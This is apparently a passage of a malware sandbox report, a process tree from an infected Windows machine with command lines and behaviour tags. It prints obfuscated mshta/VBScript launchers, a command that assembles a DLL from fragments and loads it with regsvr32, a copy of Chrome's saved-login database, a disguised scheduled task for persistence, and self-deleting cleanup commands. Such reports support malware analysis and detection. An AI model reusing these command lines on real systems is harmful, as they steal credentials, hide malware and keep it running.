                                                                                                                                                                                                                                                                                                                                                  PID:4980
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1572
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                    Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    PID:2348
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-FB1G3.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-FB1G3.tmp\Sun03f5d51697d04.tmp" /SL5="$50030,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f5d51697d04.exe"
                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                      PID:3380
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f5d51697d04.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-EHE0B.tmp\Sun03f5d51697d04.tmp
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-EHE0B.tmp\Sun03f5d51697d04.tmp" /SL5="$101DA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun03f5d51697d04.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                          PID:1060
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9SNVC.tmp\postback.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9SNVC.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                            PID:4436
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1912
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0328255c4bce6fb.exe
                                                                                                                                                                                                                                                                                                                                                      Sun0328255c4bce6fb.exe
                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                      PID:2832
                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\487108.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\487108.exe"
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\4243713.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\4243713.exe"
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                        PID:1564
                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\284182.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\284182.exe"
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                        PID:3480
                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\2332334.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\2332334.exe"
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4144
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\ProgramData\2332334.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" == """" for %N In (""C:\ProgramData\2332334.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3136
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\ProgramData\2332334.exe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" == "" for %N In ("C:\ProgramData\2332334.exe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2056
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe
                                                                                                                                                                                                                                                                                                                                                                    sev03VbOUie.exe -POVwq7z4ndmK6x4P
                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                    PID:1468
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if ""-POVwq7z4ndmK6x4P "" == """" for %N In (""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5172
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "-POVwq7z4ndmK6x4P " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5468
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBScrIPt: closE (CreAteObjECt ( "wsCRIPT.sheLl" ). rUn ( "Cmd /R EcHo | Set /P = ""MZ"" > i61_m6.3i &cOPY /B /Y I61_M6.3I + XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV " , 0 , TRuE ) )
                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R EcHo | Set /P = "MZ" > i61_m6.3i &cOPY /B /Y I61_M6.3I + XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV
                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5436
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7092
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>i61_m6.3i"
                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1720
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                      regsvr32 -s FMHAM.5hV
                                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                      PID:6056
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                taskkill -IM "2332334.exe" /F
                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                PID:4084
                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\2603995.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\2603995.exe"
                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                          PID:5100
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\control.exe"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Adds policy Run key to start application
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                  PID:6648
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    /c del "C:\Users\Admin\Pictures\Adobe Films\AzPMhddJwdJRY4KsXOiMq_Pa.exe"
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6444
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                      /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7644
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EB51.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EB51.exe
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                        PID:5824
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EB51.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EB51.exe
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                          PID:6704
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\12D0.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\12D0.exe
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1112
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\189D.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\189D.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                          PID:2584
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7E5D.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7E5D.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                          PID:5236
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ABC7.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ABC7.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                          PID:7428
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BF40.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\BF40.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                          PID:8180
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DF2D.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\DF2D.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                          PID:5916
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DF2D.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DF2D.exe
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4748
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E1E.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E1E.exe
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6516
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4B57.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4B57.exe
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6640
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Tnfvxl\certmgrmv8t.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Tnfvxl\certmgrmv8t.exe"
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1976
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5E0B.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5E0B.exe
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                  PID:9124
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5E0B.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5E0B.exe
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:10252
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                        PID:10296
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\655F.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\655F.exe
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:8756
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6A61.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6A61.exe
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                      PID:6280
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 6A61.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6A61.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:10748
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                            taskkill /im 6A61.exe /f
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                            PID:10888
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8D8A.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\8D8A.exe
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6380
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loughborough.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loughborough.exe"
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:10324
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                                                                                                                                                            • outlook_office_path
                                                                                                                                                                                                                                                                                                                                                                                            • outlook_win_path
                                                                                                                                                                                                                                                                                                                                                                                            PID:8148
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:10376
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:10460
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:10528
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:10572
                                                                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4760
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2508
                                                                                                                                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1900
                                                                                                                                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1252
                                                                                                                                                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1244
                                                                                                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1104
                                                                                                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\crjebsd
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\crjebsd
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9340
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rrjebsd
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\rrjebsd
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9384
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10800
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0397381f1f458e.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS800F4185\Sun0397381f1f458e.exe" -u
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3888
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4352
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1472
                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2784
